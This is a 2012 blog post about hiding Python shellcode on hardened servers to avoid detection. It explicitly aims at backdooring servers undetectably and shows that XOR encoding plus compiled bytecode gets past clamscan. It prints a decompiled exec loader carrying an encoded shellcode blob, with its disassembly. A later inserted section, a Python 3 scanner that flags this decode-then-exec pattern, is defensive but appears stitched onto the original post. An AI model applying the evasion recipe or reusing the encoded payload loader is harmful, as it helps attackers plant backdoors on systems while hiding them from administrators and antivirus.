Information Security


28th June 2012


Python Malware

Python is useful for backdooring a hardened server where GCC has been removed: most servers still need Python or Perl, but the malware has to be undetectable, both to the sysadmin and to antivirus.

This is the shellcode without XOR encoding:

% clamscan shellCodes.*
shellCodes.py: OK
shellCodes.pyc: Exploit.Fnstenv_mov-1 FOUND

—————- SCAN SUMMARY —————-
Known viruses: 1258678
Engine version: 0.97.5
Scanned directories: 0
Scanned files: 2
Infected files: 1
Data scanned: 0.06 MB
Data read: 0.04 MB (ratio 1.67:1)
Time: 3.531 sec (0 m 3 s)

Naked Python source code can be detected by the sysadmin.

Compiled Python byte code may slip past a lazy sysadmin, but it is definitely detected by antivirus.

Your choice!

Nope, give me another choice.

>>> import py_compile
>>> py_compile.compile("zsh.py")

This is the shellcode with XOR encoding:

% clamscan zsh.*
zsh.py: OK
zsh.pyc: OK

—————- SCAN SUMMARY —————-
Known viruses: 1258678
Engine version: 0.97.5
Scanned directories: 0
Scanned files: 2
Infected files: 0
Data scanned: 0.00 MB
Data read: 0.00 MB (ratio 0.00:1)
Time: 3.543 sec (0 m 3 s)

Yes: XOR encoding plus compiled Python byte code works best.

So if you are a good sysadmin you may want to check the files:

(REpdb:default) fs_um_decompile zshmin.pyc
[+] Decompiling single file: zshmin.pyc
[=] Decompiling zshmin.py-<module>
[+] Parsing code object of <code object <module> at 0x85bd0f8, file "zshmin.py", line 2>
[+] Disassembling….
[+] Decompiling….
[+] All code blocks got
[+] Flow graph from code blocks got
[+] DFA decompiled
[+] Complex IF’s simplified
[+] WHILE loops preprocessed
[+] All compounds simplified
[+] Consecutives simplified
[+] Source code written to: /path/to/pyretic/Projects/default/sourcecode/fs_um/singlefile/zshmin.py

% cat /path/to/pyretic/Projects/default/sourcecode/fs_um/singlefile/zshmin.py

# The minified version of zsh.py (http://www.shell-storm.org/shellcode/files/shellcode-810.php)
import bz2, base64
exec bz2.decompress(base64.b64decode('QlpoOTFBWSZTWX+u+NoAAHBfgAAQUHR/4gsBRiS/599gMADFthoKnpqaGJgTIyBkybTUNBqYptSPU8iAMjIyaBmppphqENAAAAaAANBGMGOkc/mp+b4Q/TjBquoHQ8q7FKMytMrBmaNM4FUiCWsuTYVKwmrgro0k634X45JjlJLvoCDFZqZg1wn5CFpGpGnLS13zmFhI4JTCHpNBL0PUHxnNXhppUwg8xEjPg6NEAvK4jYJObxIgOQry9BstTgJIOg/DssGqFTFCgMy/ZueQlpj4EHSkGV/VFRnaNYZ6Bd8Ta2umItkQiLB22CG7s3+wMDFD8xdyRThQkH+u+No='))

Or we can use dis or byteplay:

co_name: '<module>'
co_filename: 'zshmin.py'
co_argcount: 0
co_nlocals: 0
co_stacksize: 3
co_flags: 64 (CO_NOFREE)
co_consts:
  -1: <type 'int'>
  None: <type 'NoneType'>
  'QlpoOTFBWSZTWX+u+NoAAHBfgAAQUHR/4gsBRiS/599gMADFthoKnpqaGJgTIyBkybTUNBqYptSPU8iAMjIyaBmppphqENAAAAaAANBGMGOkc/mp+b4Q/TjBquoHQ8q7FKMytMrBmaNM4FUiCWsuTYVKwmrgro0k634X45JjlJLvoCDFZqZg1wn5CFpGpGnLS13zmFhI4JTCHpNBL0PUHxnNXhppUwg8xEjPg6NEAvK4jYJObxIgOQry9BstTgJIOg/DssGqFTFCgMy/ZueQlpj4EHSkGV/VFRnaNYZ6Bd8Ta2umItkQiLB22CG7s3+wMDFD8xdyRThQkH+u+No=': <type 'str'>
co_names: 'bz2', 'base64', 'decompress', 'b64decode'
co_varnames: (none)
co_freevars: (none)
co_cellvars: (none)

disas

line 2 ('zshmin.py')
  0   64 00 00   LOAD_CONST     0 (-1: <type 'int'>)
  3   64 01 00   LOAD_CONST     1 (None: <type 'NoneType'>)
  6   6c 00 00   IMPORT_NAME    0 ('bz2')
  9   5a 00 00   STORE_NAME     0 ('bz2')
 12   64 00 00   LOAD_CONST     0 (-1: <type 'int'>)
 15   64 01 00   LOAD_CONST     1 (None: <type 'NoneType'>)
 18   6c 01 00   IMPORT_NAME    1 ('base64')
 21   5a 01 00   STORE_NAME     1 ('base64')

line 3 ('zshmin.py')
 24   65 00 00   LOAD_NAME      0 ('bz2')
 27   6a 02 00   LOAD_ATTR      2 ('decompress')
 30   65 01 00   LOAD_NAME      1 ('base64')
 33   6a 03 00   LOAD_ATTR      3 ('b64decode')
 36   64 02 00   LOAD_CONST     2 ('QlpoOTFBWSZTWX+u+NoAAHBfgAAQUHR/4gsBRiS/599gMADFthoKnpqaGJgTIyBkybTUNBqYptSPU8iAMjIyaBmppphqENAAAAaAANBGMGOkc/mp+b4Q/TjBquoHQ8q7FKMytMrBmaNM4FUiCWsuTYVKwmrgro0k634X45JjlJLvoCDFZqZg1wn5CFpGpGnLS13zmFhI4JTCHpNBL0PUHxnNXhppUwg8xEjPg6NEAvK4jYJObxIgOQry9BstTgJIOg/DssGqFTFCgMy/ZueQlpj4EHSkGV/VFRnaNYZ6Bd8Ta2umItkQiLB22CG7s3+wMDFD8xdyRThQkH+u+No=': <type 'str'>)
 39   83 01 00   CALL_FUNCTION  1 (pos args: 1, key args: 0)
 42   83 01 00   CALL_FUNCTION  1 (pos args: 1, key args: 0)
 45   64 01 00   LOAD_CONST     1 (None: <type 'NoneType'>)
 48   04         DUP_TOP
 49   55         EXEC_STMT
 50   64 01 00   LOAD_CONST     1 (None: <type 'NoneType'>)
 53   53         RETURN_VALUE
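The decompiled source and the disassembly above both show the same shape: two decoder imports, one long base64 constant, and an EXEC_STMT on the result. A sysadmin checking .pyc files does not have to decompile to find that; the code object alone carries the indicators. The script below is an added example written for this post, not the author's code or the pyretic/byteplay output shown above. It targets Python 3 (the post works on Python 2, where exec was a statement rather than a name), reads the 16-byte .pyc header that CPython 3.7+ writes, walks the code objects, and flags the decode-then-exec pattern without ever executing the payload. The sample module it compiles (file name loader.py, payload a single print) is constructed here for the demonstration.

```python
"""Static triage of a .pyc for the staged-loader pattern shown in the post:
a long base64 constant fed to bz2/zlib decompress and then exec'd.
Added example (Python 3), not code from the original post; the sample
module it compiles is constructed here and its payload only prints."""
import base64
import binascii
import bz2
import dis
import importlib.util
import marshal
import os
import py_compile
import re
import tempfile
import types
import zlib

# Decoder modules and exec-like names that together form the one-line loader.
DECODER_MODULES = {"base64", "bz2", "zlib", "binascii", "codecs", "marshal"}
EXEC_NAMES = {"exec", "eval", "compile", "__import__"}
B64_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")  # long base64 literal


def load_code_from_pyc(path):
    """Unmarshal the module code object from a CPython 3.7+ .pyc.
    Header is 16 bytes: magic, flags, then mtime/size or a source hash."""
    with open(path, "rb") as fh:
        data = fh.read()
    if data[:4] != importlib.util.MAGIC_NUMBER:
        raise ValueError("pyc was built by a different interpreter version")
    return marshal.loads(data[16:])


def iter_code_objects(code):
    """Yield a code object and every nested code object (functions, lambdas)."""
    yield code
    for const in code.co_consts:
        if isinstance(const, types.CodeType):
            yield from iter_code_objects(const)


def peel_encoded_blob(blob):
    """Undo a base64 layer and one compression layer WITHOUT executing the
    result; return the layers recognised, e.g. ['base64', 'bz2']."""
    layers = []
    try:
        data = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return layers
    layers.append("base64")
    if data.startswith(b"BZh"):          # bz2 stream magic
        try:
            bz2.decompress(data)
            layers.append("bz2")
        except OSError:
            pass
    elif data[:1] == b"\x78":            # zlib header byte (deflate, 32K window)
        try:
            zlib.decompress(data)
            layers.append("zlib")
        except zlib.error:
            pass
    return layers


def scan_code(code):
    """Collect indicators over a code object tree and decide whether it
    matches the decode-then-exec loader pattern."""
    findings = {"decoder_imports": set(), "exec_like": set(),
                "encoded_blobs": [], "instructions": 0}
    for co in iter_code_objects(code):
        names = set(co.co_names)                 # imports, attrs, globals
        findings["decoder_imports"] |= names & DECODER_MODULES
        findings["exec_like"] |= names & EXEC_NAMES
        for const in co.co_consts:
            if isinstance(const, str) and B64_RE.match(const):
                findings["encoded_blobs"].append(
                    {"length": len(const), "layers": peel_encoded_blob(const)})
        # The same listing dis/byteplay print in the post, here only counted.
        findings["instructions"] += sum(1 for _ in dis.get_instructions(co))
    findings["suspicious"] = bool(
        findings["exec_like"]
        and (findings["decoder_imports"] or findings["encoded_blobs"]))
    return findings


def build_sample_pyc(directory):
    """Compile a CONSTRUCTED loader whose payload merely prints, so the
    scanner has a realistic .pyc to inspect. Nothing here is executed."""
    payload = b'print("constructed benign payload")'
    blob = base64.b64encode(bz2.compress(payload)).decode()
    src = ("import bz2, base64\n"
           "exec(bz2.decompress(base64.b64decode('%s')))\n" % blob)
    src_path = os.path.join(directory, "loader.py")   # hypothetical file name
    with open(src_path, "w") as fh:
        fh.write(src)
    return py_compile.compile(src_path, cfile=os.path.join(directory, "loader.pyc"))


def triage_sample():
    """Build the constructed sample and return the scanner's findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_code(load_code_from_pyc(build_sample_pyc(tmp)))
```

Run `triage_sample()` and the findings come back with `suspicious` set, `decoder_imports` equal to `{'bz2', 'base64'}`, `exec` among the exec-like names, and one blob whose layers peel as base64 then bz2, which is exactly what the byteplay dump above shows for zshmin.pyc. The scanner never decodes further than one compression layer and never calls exec, so it is safe to point at untrusted .pyc files; pair it with the decompile step when something trips it.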

(Hex dump of the base64 string.)

The shellcode is 32-bit, but I analyzed it on a 64-bit machine.

Tagged: Hardening, Malware, Obfuscating, Python, Reverse Engineering, Shellcode, x86, x86_64, System V

ABOUT THE AUTHOR

Teguh is an idealist pwner living encrypted in Indonesia.
He is passionate about security and currently defeating the CWE top 25.
He also can be found on Google+, Twitter, GitHub, Shelfari and your libc.